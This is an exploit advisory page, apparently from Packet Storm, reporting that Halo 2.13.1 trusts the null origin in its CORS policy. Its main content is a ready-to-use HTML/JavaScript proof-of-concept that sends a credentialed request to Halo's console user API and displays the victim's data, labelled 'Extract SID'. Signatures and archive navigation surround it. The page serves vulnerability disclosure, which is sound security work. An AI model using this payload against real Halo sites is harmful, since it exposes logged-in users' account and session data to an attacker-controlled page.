HALO 2.13.1 CORS Issue

HALO 2.13.1 CORS Issue: Posted Mar 15, 2024; Authored by nu11secur1ty; HALO version 2.13.1 has an insecure cross-origin resource sharing setting that allows an arbitrary origin.; tags | exploit, arbitrary; SHA-256 | d03ce00498ebd36e4dfcab8b4a25be241e021255496446e7b6df62fb6024ec33; Download | Favorite | View

HALO 2.13.1 CORS Issue

## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Author: nu11secur1ty
## Date: 03/15/2024
## Vendor: https://www.halo.run/
## Software: https://github.com/halo-dev/halo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null
The application allows two-way interaction from the null origin. This
effectively means that any domain can perform two-way interaction by
causing the browser to submit the null origin, for example by issuing
the request from a sandboxed iframe or malicious fishing domain with a
specially crafted HTML exploit.

STATUS: HIGH- Vulnerability

[+]Exploit:
```HTML
<html>
<body>
<center>
<h2>CORS POC Exploit
<h3>Extract SID

<div id="demo">
<button type="button" onclick="cors()">Exploit Click here
</div>

<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET",
"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",
true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>

</body>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)

## Time spent:
00:25:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Top Authors In Last 30 Days

Red Hat 276 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 5 files
kai6u 3 files
Adam Gowdiak 3 files
liquidsky 3 files
gabe_k 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

HALO 2.13.1 CORS Issue

HALO 2.13.1 CORS Issue

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HALO 2.13.1 CORS Issue

Share This

HALO 2.13.1 CORS Issue

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems